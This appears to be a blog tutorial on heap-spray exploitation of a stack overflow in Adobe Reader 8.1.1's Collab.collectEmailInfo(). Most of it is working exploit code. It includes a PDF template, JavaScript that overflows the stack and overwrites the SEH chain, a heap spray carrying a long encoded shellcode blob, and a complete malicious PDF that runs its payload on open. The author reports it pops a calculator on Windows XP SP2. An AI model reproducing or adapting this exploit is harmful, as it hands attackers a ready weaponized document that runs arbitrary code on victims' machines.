Heap Spray Concept:
First of all I would like readers to know that heap spray not a vulnerability like heap
overflow but it a technique used to exploit vulnerabilities. It is basically used to exploit browsers,pdf reader where embedded languages like javascript comes into play.
The reason is javascript variables are created in the heap rather than stack variables.
generally we create a large of javascript variables say using arrays
array = new array()
nops = %u9090%u9090………….%u9090;
shellcode=%u6565%u………………;
arrar[1] = nop + shellcode;
arry[2] = nop + shellcode;
arr[300] = nop + shellcode;
This fills the heap area with a combination of nops and shellcode. Usually heap resides in higher memory area like 0x0a0a0a0a …0x0c0c0c0c. We try to fill these address with the combination of nops and shellcode and later we redirect the flow to these address so that our shellcode gets executed.
Enough of theory lets move on to practical implementation.
I have tried the exploit with adobe 8.1.1 and older. A stack overflow bug exists in Collab.collectEmailInfo() in adobe. Exploitation involves spraying the heap then overwriting the EIP with heap address 0x0a0a0a0a
Lets start:
I created a PDF template using Didier Stevens tools
%PDF-1.11 0 obj<</Type /Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 7 0 R>>endobj2 0 obj<</Type /Outlines/Count 0>>endobj3 0 obj<</Type /Pages/Kids [4 0 R]/Count 1>>endobj4 0 obj<</Type /Page/Parent 3 0 R/MediaBox [0 0 612 792]/Contents 5 0 R/Resources <</ProcSet [/PDF /Text]/Font << /F1 6 0 R >>>>>>endobj5 0 obj<< /Length 56 >>streamBT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ETendstreamendobj6 0 obj<</Type /Font/Subtype /Type1/Name /F1/BaseFont /Helvetica/Encoding /MacRomanEncoding>>endobj7 0 obj<</Type /Action/S /JavaScript/JS (this.collabStore = Collab.collectEmailInfo({subj: "ss",msg: "hi"});)>>endobjxref0 80000000000 65535 f0000000012 00000 n0000000109 00000 n0000000165 00000 n0000000234 00000 n0000000439 00000 n0000000553 00000 n0000000677 00000 ntrailer<</Size 8/Root 1 0 R>>startxref784%%EOF
Code List 1
You can put any javascript code in the
/JS () in the above code and execute javascript.The following code overflows the stackvar crsh = unescape("%u1212");while (crsh.length < 0x2000)if (app.viewerVersion >= 6.0){this.collabStore = Collab.collectEmailInfo({subj: "",msg: crsh});}
Code List 2
Place the code in /JS () Code List 1
Then open adobe reader in ollydbg and run it. Then open the above pdf in adobe.If there is exception in ollydbg then press
shift+f9 till the eip gets overwritten
Also go to view SEH chain in ollydbg->view->SEH chain
So we see the SEH chain gets overwritten
Now lets create the exploit code.
Following code is use to spray the heap with shellcode and nops.
function HeapSpray(){Array2 = new Array();var Shellcode = unescape("%u3c73%u343f%u3514%u2a1c%ud6d2%ub624%u2c7c%ud538%ub8b5%uf533%u7e37%u7925%ue031%u9027%u19b2%u4be2%u4078%u097b%u71f8%u9948%ubf8d%u1d9f%u4315%u767d%u752d%u494e%u98b0%u727f%u7a76%ub30c%u8392%ue2d1%u3d7c%u91b9%u2270%u2ffc%ub2a8%u2c92%u4796%ua90d%u357b%ub49f%u98b0%u04b3%uf539%u46b8%uf929%u7d4f%u7315%ubf66%u778d%ub54a%u417e%ue319%u0243%ubbd5%ueb31%u781c%u9325%ube42%u9990%u2405%u103c%ud4d0%ufd84%u1879%u2be1%u74f8%u0827%u40d6%ub72d%ue009%u491d%u3771%u3fb1%u6748%u7534%ub64e%u9b0c%u3dba%u147c%u8797%ue1f7%u8c4b%u0ce2%u808d%u66f9%u404a%u2f3d%ue311%u277a%u2442%u38bf%u93fd%u25b4%u491c%u0191%u1df8%u9747%u4f71%u9048%u7e35%ub54e%u4bb8%u99b0%ud603%u373c%u78b2%u702c%ua843%u04b1%u85b6%u7deb%ufc6b%u7bb9%u6773%ub3a9%u7672%ube0d%u4115%u0534%u7492%uf512%ud50a%u7f79%u2175%u2de0%u9b9f%uff83%uc0c7%u77d4%u3f46%uba96%u98b7%u14bb%uba24%u7d2f%u4377%u7690%ubf3d%u728d%ufd30%u49b4%ub266%u89bb%ue2d2%u2570%ub09f%u3c78%ub840%u4e27%ue01a%u3746%ub12d%u4297%uf988%u7b04%u3579%u3275%uc6fe%ue3c1%uf869%u2873%u47eb%u4b7f%ub998%u3414%u9691%uf523%ufc13%u7a93%u9967%ud620%u051d%u74a8%u2271%u4ad4%u15a9%u484f%ud51b%u3fbe%ub6b3%u0cb7%ue181%u922c%u0d9b%u1c7c%u7eb5%u7341%u667a%u70be%u7974%u757b%ub737%ud33a%u9ff9%ub62f%u2598%u4034%u9067%u777f%uf60b%u1de3%u3993%u4ae2%u422d%u1571%u247e%u4792%ub5a8%u3fb0%u7d0c%ud62a%u86b1%ue0f7%u8d4f%ua943%u761c%u4e0d%u05bb%u3327%u46f5%u3d9b%u3c35%u3b72%u04f8%uf621%u4bd4%u41b8%u7897%ufd22%u9114%u7cb9%ufc03%ud186%u20eb%u49e1%ub3bf%u9699%u2cb4%u48b2%ud533%u7bba%u8366%u72e3%u7014%ud069%u98d4%u963c%u3f74%u7877%u737a%u8d49%u1941%u71e1%u0105%ub2f8%u4f4a%u0d7c%ud30a%u79eb%uf52b%u34b5%ube43%u97b7%u1c04%ub990%u2c35%u819f%uf9c1%u6b48%u93fc%u3775%u0c2f%ua9b3%u272d%u91ba%u7da8%u9225%u994e%ud584%ubb46%u761d%ub115%u1a7f%u42e0%ub647%u9bb8%ud631%u243d%ufd0b%ub0bf%ue211%ub467%u7e4b%u7c7b%u7e78%u7477%u9740%u109b%u05e3%ub13c%u85bb%u47d5%u6670%ub741%uf829%u3a72%u71eb%u2f7a%u7d46%u4875%u7fb9%u1d04%u894f%u37e0%u93b5%u7973%ufc3b%ub64e%u9298%u9f3f%ua9a8%ufd08%u1cbf%u144a%u340c%u322c%u2de1%ub296%uba67%u4976%uf502%u25be%u4b40%ue280%u9943%u7bb3%ue030%ub027%ub4b8%u7691%u7015%u7942%ud638%u3974%u35eb%ue288%u7c24%ud412%ud287%u0de3%u3d77%u908d%u1b71%u7ef9%uf528%u9966%u3c73%u922c%u2a72%u0df9%u4a4f%ud523%u187f%u7afd%u0935%u2fe1%ubb47%u48be%ub2b6%u7d91%u7805%ud413%ub8b0%u1475%u438d%u9634%u044b%u970c%u8cb9%u25d6%u1d90%u931c%u27ba%ub3bf%ua846%u24a9%uc041%u40f8%u153d%u4e42%ub49f%ub5b7%ufc3f%u492d%ub167%u9b98%uda37%ubace%ufdc9%u156d%u74d9%uf424%u2b58%ub1c9%u3133%u1750%u5003%u8317%uf909%ue08f%uea75%u0bd9%ueb85%u82b9%uda60%uf1eb%u4fe1%u713c%u63a7%ud7b7%uf753%uffb5%ub054%u2670%u415b%ue6b5%u8137%u9ad7%ud645%ua237%u2b86%ue339%uc4fa%ubc6b%u7671%uc99c%u4bc7%u1d9d%uf34c%u18e5%u8092%u225f%u39c2%u6ceb%u32fa%u4cb3%u97fb%ub1a7%u9cb2%u411c%u7545%uaa6d%ub974%u9522%u34b9%ud13a%ua77d%u2949%u5a7e%uea4a%u80fd%uefdf%u43a5%ud447%u8754%u9f1e%u6c5a%uc754%u737e%u73b9%uf87a%u543c%uba0b%u701a%u1850%u2102%ucf3c%u313b%ub098%u3999%ua40a%u6398%u3b40%u1e28%u3b2d%u2132%u541d%uaa03%u23f2%u799c%udcb7%u20d6%u7491%ub0bf%u18a0%u6f40%u24e6%u9ac3%ud296%ueedb%u9f93%u025b%ub0e9%u2409%ub05e%u471b%u2201%ua6c7%uc2a4%ub762");var SprayValue = unescape("%u9090%u9090");do{SprayValue +=SprayValue}while(SprayValue.length < 800000/2);for(j=0;j<200;j++) Array2[j]=SprayValue+Shellcode;}
You can adjust the values 800000/2 and j<200 and test the exploit.
The following code is used to do a SEH overwrite which redirects the code to 0x0a0a0a0a on heap where our shellcode resides.
var crsh = unescape("%u0a0a%u0a0a");while (crsh.length < 0x4000)crsh += crsh;if (app.viewerVersion >= 6.0){this.collabStore = Collab.collectEmailInfo({subj: "",msg: crsh});}
Now the complete exploit code alltogether.
%PDF-1.11 0 obj<</Type /Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 7 0 R>>endobj2 0 obj<</Type /Outlines/Count 0>>endobj3 0 obj<</Type /Pages/Kids [4 0 R]/Count 1>>endobj4 0 obj<</Type /Page/Parent 3 0 R/MediaBox [0 0 612 792]/Contents 5 0 R/Resources <</ProcSet [/PDF /Text]/Font << /F1 6 0 R >>>>>>endobj5 0 obj<< /Length 56 >>streamBT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ETendstreamendobj6 0 obj<</Type /Font/Subtype /Type1/Name /F1/BaseFont /Helvetica/Encoding /MacRomanEncoding>>endobj7 0 obj<</Type /Action/S /JavaScript/JS (function HeapSpray(){Array2 = new Array();var Shellcode = unescape("%u3c73%u343f%u3514%u2a1c%ud6d2%ub624%u2c7c%ud538%ub8b5%uf533%u7e37%u7925%ue031%u9027%u19b2%u4be2%u4078%u097b%u71f8%u9948%ubf8d%u1d9f%u4315%u767d%u752d%u494e%u98b0%u727f%u7a76%ub30c%u8392%ue2d1%u3d7c%u91b9%u2270%u2ffc%ub2a8%u2c92%u4796%ua90d%u357b%ub49f%u98b0%u04b3%uf539%u46b8%uf929%u7d4f%u7315%ubf66%u778d%ub54a%u417e%ue319%u0243%ubbd5%ueb31%u781c%u9325%ube42%u9990%u2405%u103c%ud4d0%ufd84%u1879%u2be1%u74f8%u0827%u40d6%ub72d%ue009%u491d%u3771%u3fb1%u6748%u7534%ub64e%u9b0c%u3dba%u147c%u8797%ue1f7%u8c4b%u0ce2%u808d%u66f9%u404a%u2f3d%ue311%u277a%u2442%u38bf%u93fd%u25b4%u491c%u0191%u1df8%u9747%u4f71%u9048%u7e35%ub54e%u4bb8%u99b0%ud603%u373c%u78b2%u702c%ua843%u04b1%u85b6%u7deb%ufc6b%u7bb9%u6773%ub3a9%u7672%ube0d%u4115%u0534%u7492%uf512%ud50a%u7f79%u2175%u2de0%u9b9f%uff83%uc0c7%u77d4%u3f46%uba96%u98b7%u14bb%uba24%u7d2f%u4377%u7690%ubf3d%u728d%ufd30%u49b4%ub266%u89bb%ue2d2%u2570%ub09f%u3c78%ub840%u4e27%ue01a%u3746%ub12d%u4297%uf988%u7b04%u3579%u3275%uc6fe%ue3c1%uf869%u2873%u47eb%u4b7f%ub998%u3414%u9691%uf523%ufc13%u7a93%u9967%ud620%u051d%u74a8%u2271%u4ad4%u15a9%u484f%ud51b%u3fbe%ub6b3%u0cb7%ue181%u922c%u0d9b%u1c7c%u7eb5%u7341%u667a%u70be%u7974%u757b%ub737%ud33a%u9ff9%ub62f%u2598%u4034%u9067%u777f%uf60b%u1de3%u3993%u4ae2%u422d%u1571%u247e%u4792%ub5a8%u3fb0%u7d0c%ud62a%u86b1%ue0f7%u8d4f%ua943%u761c%u4e0d%u05bb%u3327%u46f5%u3d9b%u3c35%u3b72%u04f8%uf621%u4bd4%u41b8%u7897%ufd22%u9114%u7cb9%ufc03%ud186%u20eb%u49e1%ub3bf%u9699%u2cb4%u48b2%ud533%u7bba%u8366%u72e3%u7014%ud069%u98d4%u963c%u3f74%u7877%u737a%u8d49%u1941%u71e1%u0105%ub2f8%u4f4a%u0d7c%ud30a%u79eb%uf52b%u34b5%ube43%u97b7%u1c04%ub990%u2c35%u819f%uf9c1%u6b48%u93fc%u3775%u0c2f%ua9b3%u272d%u91ba%u7da8%u9225%u994e%ud584%ubb46%u761d%ub115%u1a7f%u42e0%ub647%u9bb8%ud631%u243d%ufd0b%ub0bf%ue211%ub467%u7e4b%u7c7b%u7e78%u7477%u9740%u109b%u05e3%ub13c%u85bb%u47d5%u6670%ub741%uf829%u3a72%u71eb%u2f7a%u7d46%u4875%u7fb9%u1d04%u894f%u37e0%u93b5%u7973%ufc3b%ub64e%u9298%u9f3f%ua9a8%ufd08%u1cbf%u144a%u340c%u322c%u2de1%ub296%uba67%u4976%uf502%u25be%u4b40%ue280%u9943%u7bb3%ue030%ub027%ub4b8%u7691%u7015%u7942%ud638%u3974%u35eb%ue288%u7c24%ud412%ud287%u0de3%u3d77%u908d%u1b71%u7ef9%uf528%u9966%u3c73%u922c%u2a72%u0df9%u4a4f%ud523%u187f%u7afd%u0935%u2fe1%ubb47%u48be%ub2b6%u7d91%u7805%ud413%ub8b0%u1475%u438d%u9634%u044b%u970c%u8cb9%u25d6%u1d90%u931c%u27ba%ub3bf%ua846%u24a9%uc041%u40f8%u153d%u4e42%ub49f%ub5b7%ufc3f%u492d%ub167%u9b98%uda37%ubace%ufdc9%u156d%u74d9%uf424%u2b58%ub1c9%u3133%u1750%u5003%u8317%uf909%ue08f%uea75%u0bd9%ueb85%u82b9%uda60%uf1eb%u4fe1%u713c%u63a7%ud7b7%uf753%uffb5%ub054%u2670%u415b%ue6b5%u8137%u9ad7%ud645%ua237%u2b86%ue339%uc4fa%ubc6b%u7671%uc99c%u4bc7%u1d9d%uf34c%u18e5%u8092%u225f%u39c2%u6ceb%u32fa%u4cb3%u97fb%ub1a7%u9cb2%u411c%u7545%uaa6d%ub974%u9522%u34b9%ud13a%ua77d%u2949%u5a7e%uea4a%u80fd%uefdf%u43a5%ud447%u8754%u9f1e%u6c5a%uc754%u737e%u73b9%uf87a%u543c%uba0b%u701a%u1850%u2102%ucf3c%u313b%ub098%u3999%ua40a%u6398%u3b40%u1e28%u3b2d%u2132%u541d%uaa03%u23f2%u799c%udcb7%u20d6%u7491%ub0bf%u18a0%u6f40%u24e6%u9ac3%ud296%ueedb%u9f93%u025b%ub0e9%u2409%ub05e%u471b%u2201%ua6c7%uc2a4%ub762");var SprayValue = unescape("%u9090%u9090");do{SprayValue +=SprayValue}while(SprayValue.length < 800000/2);for(j=0;j<200;j++) Array2[j]=SprayValue+Shellcode;}HeapSpray();var crsh = unescape("%u0a0a%u0a0a");while (crsh.length < 0x4000)crsh += crsh;if (app.viewerVersion >= 6.0){this.collabStore = Collab.collectEmailInfo({subj: "",msg: crsh});})>>endobjxref0 80000000000 65535 f0000000012 00000 n0000000109 00000 n0000000165 00000 n0000000234 00000 n0000000439 00000 n0000000553 00000 n0000000677 00000 ntrailer<</Size 8/Root 1 0 R>>startxref784%%EOF
And the calc pops up.
So here is our working exploit.
Thanks to my friend Amit Malik who helped me to make the exploit reliable.
Tried on tested on Windows XP SP2 adobe version 8.1.1 .
references:http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html